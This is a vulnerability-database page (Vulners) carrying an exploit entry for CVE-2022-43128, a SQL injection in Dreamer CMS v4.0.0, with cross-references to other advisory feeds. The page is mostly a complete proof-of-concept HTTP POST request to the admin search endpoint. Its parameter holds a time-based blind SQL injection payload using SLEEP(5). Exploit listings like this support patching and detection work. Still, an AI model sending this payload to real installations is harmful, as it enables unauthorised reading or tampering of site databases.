Vulners
Lucene search
Dreamer CMS v4.0.0 - SQL Injection
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Dreamer CMS v4.0.0 - SQL Injection Vulnerability | 30 Mar 202300:00 | – | zdt |
 | CVE-2022-43128 | 16 Apr 202302:15 | – | attackerkb |
 | CVE-2022-43128 | 16 Apr 202307:27 | – | circl |
 | 编号撤回 | 30 Mar 202300:00 | – | cnnvd |
 | CVE-2022-43128 | 16 Apr 202301:50 | – | cve |
 | CVE-2022-43128 | 16 Apr 202301:50 | – | cvelist |
 | CVE-2022-43128 | 16 Apr 202302:15 | – | nvd |
 | Dreamer CMS 4.0.0 SQL Injection | 30 Mar 202300:00 | – | packetstorm |
 | PT-2023-14177 · Unknown · Dreamer Cms | 16 Apr 202300:00 | – | ptsecurity |
# Exploit Title: Dreamer CMS v4.0.0 - SQL Injection
# Date: 2022/10/02
# Exploit Author: lvren
# Vendor Homepage: http://cms.iteachyou.cc/
# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip
# Version: v4.0.0
# CVE: CVE-2022-43128
Proof Of Concept:
POST /admin/search/doSearch HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/admin/search/doSearch
Cookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739
Upgrade-Insecure-Requests: 1
entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386
lvren
[email protected]
签名由 网易灵犀办公 定制Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Mar 2023 00:00Current
6.7Medium risk
Vulners AI Score6.7